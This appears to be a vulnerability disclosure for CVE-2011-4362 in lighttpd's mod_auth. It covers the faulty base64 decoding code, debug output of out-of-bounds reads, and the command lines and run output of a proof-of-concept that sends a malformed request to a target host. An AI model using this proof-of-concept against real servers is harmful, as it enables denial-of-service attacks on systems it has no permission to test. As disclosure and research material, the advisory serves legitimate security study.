222 lines
4.7 KiB
Text
Executable file
222 lines
4.7 KiB
Text
Executable file
29 of November 2011 was the date of public disclosure interesting
|
|
vulnerability in lighttpd server. Xi Wang discovered that mod_auth
|
|
for this server does not propely decode characters from the extended
|
|
ASCII table. The vulnerable code is below:
|
|
|
|
|
|
"src/http_auth.c:67"
|
|
--- CUT ---
|
|
static const short base64_reverse_table[256] = ...;
|
|
static unsigned char * base64_decode(buffer *out, const char *in) {
|
|
...
|
|
int ch, ...;
|
|
size_t i;
|
|
...
|
|
|
|
ch = in[i];
|
|
...
|
|
ch = base64_reverse_table[ch];
|
|
...
|
|
}
|
|
--- CUT ---
|
|
|
|
Because variable 'in' is type 'char', characters above 0x80 lead to
|
|
negative indices.
|
|
This vulnerability may lead out-of-boud read and theoretically cause
|
|
Segmentation Fault (Denial of Service attack).
|
|
Unfortunately I couldn't find any binaries where .rodata section before
|
|
the base64_reverse_table
|
|
table cause this situation.
|
|
|
|
I have added some extra debug in the lighttpd source code to see if this
|
|
vulnerability is
|
|
executed correctly. Here is output for one of the example:
|
|
|
|
--- CUT ---
|
|
ptr[0x9a92c48] size[0xc0] used[0x0]
|
|
127(. | 0 | 0)
|
|
-128(t | 1 | 0)
|
|
-127(e | 2 | 1)
|
|
-126(' | 3 | 2)
|
|
-125(e | 4 | 3)
|
|
-124(u | 5 | 3)
|
|
-123(r | 6 | 4)
|
|
-122(' | 7 | 5)
|
|
-121(s | 8 | 6)
|
|
-120(c | 9 | 6)
|
|
-119(i | 10 | 7)
|
|
-118(n | 11 | 8)
|
|
-117(i | 12 | 9)
|
|
-116( | 13 | 9)
|
|
-115(a | 14 | 10)
|
|
-114(t | 15 | 11)
|
|
-113(. | 16 | 12)
|
|
-112(e | 17 | 12)
|
|
-111(u | 18 | 13)
|
|
-110(r | 19 | 14)
|
|
-109(' | 20 | 15)
|
|
-108(f | 21 | 15)
|
|
-107(i | 22 | 16)
|
|
-106(e | 23 | 17)
|
|
-105(: | 24 | 18)
|
|
-104(= | 25 | 18)
|
|
-103(o | 26 | 19)
|
|
-102(t | 27 | 20)
|
|
-101(o | 28 | 21)
|
|
-100( | 29 | 21)
|
|
-99(a | 30 | 22)
|
|
-98(g | 31 | 23)
|
|
-97(. | 32 | 24)
|
|
-96(d | 33 | 24)
|
|
-95(g | 34 | 25)
|
|
-94(s | 35 | 26)
|
|
-93(: | 36 | 27)
|
|
-92(u | 37 | 27)
|
|
-91(s | 38 | 28)
|
|
-90(p | 39 | 29)
|
|
-89(o | 40 | 30)
|
|
-88(t | 41 | 30)
|
|
-87(d | 42 | 31)
|
|
-86(b | 43 | 32)
|
|
-85(c | 44 | 33)
|
|
-84(e | 45 | 33)
|
|
-83(d | 46 | 34)
|
|
-82(( | 47 | 35)
|
|
-81(n | 48 | 36)
|
|
-80(y | 49 | 36)
|
|
-79(h | 50 | 37)
|
|
-78(d | 51 | 38)
|
|
-77(g | 52 | 39)
|
|
-76(s | 53 | 39)
|
|
-75( | 54 | 40)
|
|
-74(r | 55 | 41)
|
|
-73(p | 56 | 42)
|
|
-72(a | 57 | 42)
|
|
-71(n | 58 | 43)
|
|
-70(. | 59 | 44)
|
|
-69(. | 60 | 45)
|
|
-68(d | 61 | 45)
|
|
-67(g | 62 | 46)
|
|
-66(s | 63 | 47)
|
|
-65(: | 64 | 48)
|
|
-64(( | 65 | 48)
|
|
-63(d | 66 | 49)
|
|
-62(- | 67 | 50)
|
|
-61(e | 68 | 51)
|
|
-60(s | 69 | 51)
|
|
-59( | 70 | 52)
|
|
-58(i | 71 | 53)
|
|
-57(s | 72 | 54)
|
|
-56(n | 73 | 54)
|
|
-55( | 74 | 55)
|
|
-54(i | 75 | 56)
|
|
-53(l | 76 | 57)
|
|
-52(. | 77 | 57)
|
|
-51(. | 78 | 58)
|
|
-50(k | 79 | 59)
|
|
-49(0 | 80 | 60)
|
|
-48(% | 81 | 60)
|
|
-47(] | 82 | 61)
|
|
-46(p | 83 | 62)
|
|
-45(r | 84 | 63)
|
|
-44(0 | 85 | 63)
|
|
-43(% | 86 | 64)
|
|
-42(] | 87 | 65)
|
|
-41(s | 88 | 66)
|
|
-40(z | 89 | 66)
|
|
-39([ | 90 | 67)
|
|
-38(x | 91 | 68)
|
|
-37(x | 92 | 69)
|
|
-36( | 93 | 69)
|
|
-35(s | 94 | 70)
|
|
-34(d | 95 | 71)
|
|
-33(0 | 96 | 72)
|
|
-32(% | 97 | 72)
|
|
-31(] | 98 | 73)
|
|
-30(. | 99 | 74)
|
|
-29(. | 100 | 75)
|
|
-28(d | 101 | 75)
|
|
-27(c | 102 | 76)
|
|
-26(d | 103 | 77)
|
|
-25(i | 104 | 78)
|
|
-24(g | 105 | 78)
|
|
-23(b | 106 | 79)
|
|
-22(s | 107 | 80)
|
|
-21(6 | 108 | 81)
|
|
-20(- | 109 | 81)
|
|
-19(t | 110 | 82)
|
|
-18(i | 111 | 83)
|
|
-17(g | 112 | 84)
|
|
-16(f | 113 | 84)
|
|
-15(i | 114 | 85)
|
|
-14(e | 115 | 86)
|
|
-13(. | 116 | 87)
|
|
-12(. | 117 | 87)
|
|
-11(. | 118 | 88)
|
|
-10(. | 119 | 89)
|
|
-9(. | 120 | 90)
|
|
-8(. | 121 | 90)
|
|
-7(. | 122 | 91)
|
|
-6(. | 123 | 92)
|
|
-5(. | 124 | 93)
|
|
-4(. | 125 | 93)
|
|
-3(. | 126 | 94)
|
|
-2(. | 127 | 95)
|
|
-1(. | 128 | 96)
|
|
k[0x60] ptr[0x9a92c48] size[0xc0] used[0x0]
|
|
ptr[0x9a92c48] size[0xc0] used[0x60]
|
|
string [.Yg.\...n.Xt.]r.ze.....g.Y..\..Yb.Y(..d..r.[..Y...-.xi..i.]
|
|
--- CUT ---
|
|
|
|
First column is the offset so vulnerability is executed like it should be
|
|
(negative offsets). Second column is byte which is read out-of-bound.
|
|
|
|
How to run this very primitive Proof of Concept?
|
|
|
|
$ gcc p_cve-2011-4362.c -o p_cve-2011-4362
|
|
$ ./p_cve-2011-4362
|
|
|
|
...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)
|
|
]=- :::...
|
|
|
|
Usage: ./p_cve-2011-4362 <options>
|
|
|
|
Options:
|
|
-v <victim>
|
|
-p <port>
|
|
-d <remote_dir_for_auth>
|
|
|
|
$ ./p_cve-2011-4362 -h 127.0.0.1 -p 81 -d dupa
|
|
|
|
...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki)
|
|
]=- :::...
|
|
|
|
[+] Preparing arguments... OK
|
|
[+] Creating socket... OK
|
|
[+] Connecting to [127.0.0.1]... OK
|
|
[+] Sending dirty packet... OK
|
|
|
|
[+] Check the website!
|
|
|
|
$
|
|
|
|
Lighttpd will log this situation probably in error-log file like this:
|
|
|
|
--- CUT ---
|
|
..
|
|
..
|
|
2011-12-xx xx:xx:11: (http_auth.c.887) : is missing in
|
|
?Yg\???n?Xt?]rze???gY??\??Yb?Y(?d??r?[Y???-?xi??i?k?Wp? ]???\???@V??x???ize
|
|
|
|
--- CUT ---
|
|
|
|
Maybe you can find vulnerable binary?
|
|
|
|
Best regards,
|
|
Adam 'pi3' Zabrocki
|
|
|
|
|
|
--
|
|
http://pi3.com.pl
|
|
http://www.exploit-db.com/sploits/p_cve-2011-4362.c
|
|
http://blog.pi3.com.pl/?p=277
|